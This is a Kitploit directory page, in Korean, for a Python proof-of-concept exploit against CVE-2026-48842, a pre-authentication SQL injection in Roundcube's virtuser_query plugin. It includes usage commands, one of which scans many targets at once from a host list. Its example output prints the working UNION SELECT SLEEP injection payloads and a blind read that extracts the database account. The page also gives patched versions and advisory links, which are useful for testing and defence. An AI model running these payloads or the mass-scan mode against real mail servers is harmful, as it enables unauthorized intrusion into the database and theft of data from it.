Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-48842 — CVE-2026-48842에 대한 Python PoC로, Roundcube의 virtuser_query 플러그인에서 발생하는 인증 전 SQL 인젝션입니다. 시간 기반 차등 분석으로 취약점을 확인하고 DB 계정을 블라인드 리드합니다. | Kitploit
도구/GitHubGitHub/4minx/cve-2026-48842
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase Security
GitHub4minx/cve-2026-48842

CVE-2026-48842

CVE-2026-48842에 대한 Python PoC로, Roundcube의 virtuser_query 플러그인에서 발생하는 인증 전 SQL 인젝션입니다. 시간 기반 차등 분석으로 취약점을 확인하고 DB 계정을 블라인드 리드합니다.

저장소 보기
6시간 50분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-48842 PoC — Roundcube virtuser_query 사전 인증 SQLi

Roundcube Webmail의 선택적 virtuser_query 플러그인에 존재하는 사전 인증 SQL 인젝션인 CVE-2026-48842에 대한 PoC입니다.

이 도구는 두 가지를 수행하며, 어느 것에 대해서도 추측하지 않습니다:

  1. 참/거짓 차등 방식(단일 sleep이 아님)으로 인젝션을 확인합니다.
  2. --dumpdbuser를 사용하여 대상에서 데이터베이스 계정을 읽어 영향을 입증합니다.

각 프로브가 생성하는 정확한 SQL을 출력하므로, 실패하거나 불확실한 결과가 발견 사항으로 제시되는 일은 없습니다.


취약점 정보

CVECVE-2026-48842
유형CWE-89 — SQL 인젝션
구성 요소plugins/virtuser_query/virtuser_query.php (기본적으로 활성화되지 않음)
영향 받는 버전Roundcube 1.6.x < 1.6.16, 1.7.x < 1.7.1
수정 버전1.6.16, 1.7.1

요구 사항

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

사용법

단일 대상, 탐지만

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

단일 대상, DB 계정을 읽어 영향 입증

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

더 빠른 오라클 (바쁜 호스트는 튜닝이 필요할 수 있음)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

다수 대상

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

옵션

인수설명기본값
targetRoundcube 기본 URL, 예: https://mail.example.tld 또는 http://host/roundcube—
-l, --list FILE한 줄에 하나의 대상 URL이 있는 파일. #은 주석을 시작합니다.—
-d, --delay N오라클 프로브당 SLEEP 초7
--dumpdbuser인젝션이 확인되면 CURRENT_USER()를 블라인드로 읽음off
-h, --help도움말 표시—

출력 예시

로컬 Roundcube 1.6.15에 대한 실제 실행:

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ 후원

이 프로젝트가 도움이 되었다면, 개발을 후원하는 것을 고려해 주세요:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

참고 자료

  • Roundcube 보안 권고 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • 수정 커밋 (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • 수정 커밋 (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
도구 다운로드